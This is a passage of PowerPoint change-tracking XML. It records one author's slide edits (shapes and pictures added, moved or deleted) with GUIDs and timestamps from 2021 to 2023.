          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:28.026" v="2154" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328644533" sldId="479"/>
            <ac:spMk id="4" creationId="{BE1D27EA-588B-401A-9718-88D7EBF730E2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:38.082" v="2189" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3785954803" sldId="480"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:09.330" v="2187" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2418320045" sldId="481"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:14:49.827" v="2182" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:spMk id="2" creationId="{89A0440F-A056-4BE8-BB8E-3861FE9122E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:04.794" v="2186" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:09.330" v="2187" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1683867025" sldId="482"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:17:00.362" v="2200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="2" creationId="{370CD65D-A6BF-459B-B957-130607D9A183}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:17:00.362" v="2200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="3" creationId="{14E221CD-1194-403A-B19C-68DC832EA380}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:21:15.195" v="2236" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="4" creationId="{7DAB109A-81C9-4DD3-8487-BE9AFF4EB873}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:45.826" v="2376" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="10" creationId="{E2F4B83A-F831-40D4-82DA-F49661823B00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:46:09.969" v="2392" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="13" creationId="{23EFB75A-E6AF-44D0-96A9-AE129FC68B33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:22:58.690" v="2240" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="6" creationId="{590C8BB6-78DF-41E4-BDD5-345FFE58E89A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:41.399" v="2375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="8" creationId="{1F7C72D0-D62A-499C-A6B8-7C849AB1212E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:33.106" v="2374" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="12" creationId="{C1B437B6-903E-460C-9EB2-20C06AB05D3D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:56:48.230" v="2412" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2787378180" sldId="483"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3022927922" sldId="484"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:27:29.973" v="2262" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="2" creationId="{2B982A6D-5381-41E2-B506-D53AEA7933D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:37:26.738" v="2316" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="11" creationId="{F773C795-1940-4E5A-899F-EA8CDF1F6AE5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:38:09.646" v="2359" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="12" creationId="{CF0E252C-8AA9-4860-AF85-370DFD079DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:52.734" v="2295" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="4" creationId="{E85F83B3-8302-4D0C-B0C7-D3AD121DF968}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:50.381" v="2294" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="6" creationId="{707C8B56-5CBF-4DE9-8088-9CA3B9209579}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:35:23.635" v="2278" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="8" creationId="{E0CD9D1B-1E66-4C9A-A04E-06E607F82934}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:26.044" v="2293" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="10" creationId="{B08BF884-CDEF-4D7A-914C-9F0D4CEB8299}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:39:20.031" v="2363" actId="1582"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:cxnSpMk id="14" creationId="{BDCC988F-E9BC-43F2-81CE-1E02CB63E18F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:46:49.132" v="2393" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="695818154" sldId="485"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:44:33.674" v="2367" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="695818154" sldId="485"/>
            <ac:spMk id="2" creationId="{C9749E0C-3927-40D0-B166-F7DF86ACDCF8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:31.851" v="2530" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1979037057" sldId="485"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:12.539" v="2426" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="2" creationId="{E353B482-F9B1-4425-BB0E-1FBC780FF119}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:12.539" v="2426" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="3" creationId="{BDE0E3D6-0581-4B95-841A-7EB7C500F166}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:18.219" v="2428" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="4" creationId="{74134226-8147-4CB6-907D-194E579F0C6F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:18.219" v="2428" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="5" creationId="{604A5F76-9478-46DE-81F4-F60B4DC48618}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:02:14.978" v="2432"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="6" creationId="{6A5364ED-6372-42B0-8F40-B24AA14AA454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="11" creationId="{8A39246C-5DBA-4DED-9015-D17CDBB97641}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="12" creationId="{09D4ED7B-C96A-4351-AAAA-9646E192FBFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:17.718" v="2528" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="14" creationId="{8C2B2658-1045-4FCC-BBFF-9F50A6C9B15C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="8" creationId="{D6642376-3771-4A23-988A-14E881E82403}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="10" creationId="{9EF32C83-75BB-4834-92CD-1D2764C7758A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:31.851" v="2530" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="13" creationId="{2BDA334F-F2DA-484C-B219-4E9F22B21626}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:48.822" v="2534" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="229412847" sldId="486"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:46.722" v="2533" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:48.822" v="2534" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:45.159" v="2532" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="1026" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:08:17.943" v="2575" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127162036" sldId="487"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:04:38.120" v="2571" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127162036" sldId="487"/>
            <ac:spMk id="2" creationId="{E9795CE5-4D04-4CBA-8767-87D7588611F2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:08:17.943" v="2575" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127162036" sldId="487"/>
            <ac:picMk id="4" creationId="{2039DE48-F833-4C4D-AEA6-65EC61529D54}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:22:01.874" v="2619"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1436574554" sldId="488"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:20:19.941" v="2615" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1436574554" sldId="488"/>
            <ac:spMk id="2" creationId="{A4717730-4F34-4130-AAF8-EBC15D008936}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:21:44.888" v="2618" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1436574554" sldId="488"/>
            <ac:picMk id="4" creationId="{25A627BB-5496-40EF-8103-AF171432D7F1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:29.686" v="2637"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3579863255" sldId="489"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:24.944" v="2636" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3579863255" sldId="489"/>
            <ac:spMk id="2" creationId="{DBCCA8B4-61C1-4A38-8741-45E1A46ADE0F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:29.686" v="2637"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3579863255" sldId="489"/>
            <ac:spMk id="3" creationId="{4FB77B5E-3139-4C66-8935-9AA9B15E530D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:24.944" v="2636" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3579863255" sldId="489"/>
            <ac:spMk id="4" creationId="{774A7D27-F957-4AEB-B39F-C8C34744C674}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:16.195" v="2639" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="366514627" sldId="490"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}"/>
    <pc:docChg chg="undo redo custSel addSld modSld">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-10T00:24:31.695" v="1298" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T20:57:37.526" v="1207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T20:57:37.526" v="1207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="7" creationId="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:32:11.250" v="1055" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2616338024" sldId="373"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:32:11.250" v="1055" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2616338024" sldId="373"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2023-02-09T14:06:47.030" v="1274" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3782016356" sldId="428"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
